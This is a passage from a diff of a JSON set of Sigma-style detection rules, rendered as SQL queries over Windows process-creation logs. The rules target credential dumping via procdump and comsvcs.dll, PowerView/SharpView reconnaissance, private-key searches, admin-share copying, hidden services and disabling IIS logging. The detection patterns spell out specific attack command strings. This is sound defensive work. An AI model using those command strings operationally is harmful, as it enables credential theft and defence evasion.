'%\\\\desktop.ini %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_attrib_hiding_files.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", - "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "title": "Dumping Process via Sqldumper.exe", + "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "status": "test", + "description": "Detects process dump via legitimate sqldumper.exe binary", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], - "level": "high", + "falsepositives": [ + "Legitimate MSSQL Server actions" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "title": "Gpscript Execution", + "id": "1e59c230-6670-45bf-83b0-98903780607e", "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate uses of logon scripts distributed via group policy" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_lolbin_gpscript.yml" }, { - "title": "Esentutl Gather Credentials", - "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "title": "Sdclt Child Processes", + "id": "da2738f2-fadb-4394-afa7-0a0674885afa", "status": "test", - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "author": "sam0x90", + "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "To be determined" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_esentutl_params.yml" + "filename": "proc_creation_win_sdclt_child_process.yml" }, { - "title": "Wusa Extracting Cab Files", - "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", + "title": "Process Reconnaissance Via Wmic.EXE", + "id": "221b251a-357a-49a9-920a-271802777cc0", "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + "filename": "proc_creation_win_wmic_recon_process.yml" }, { - "title": "DLL Loaded via CertOC.EXE", - "id": "242301bc-f92f-4476-8718-78004a6efd9f", - "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", - "author": "Austin Songer @austinsonger", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" + ], + "falsepositives": [ + "Unlikely, because no one should dump the process memory in that way" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + }, + { + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certoc_load_dll.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "Private Keys Reconnaissance Via CommandLine Tools", - "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "author": "frack113", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_private_keys_recon.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", + "status": "stable", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Potential Persistence Via Microsoft Compatibility Appraiser", - "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", "status": "experimental", - "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", - "author": "Sreeman", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "PUA - WebBrowserPassView Execution", - "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "status": "experimental", - "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Web Browser Password Viewer' OR NewProcessName LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_webbrowserpassview.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", - "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "status": "stable", + "description": "Detects possible successful exploitation for vulnerability described in 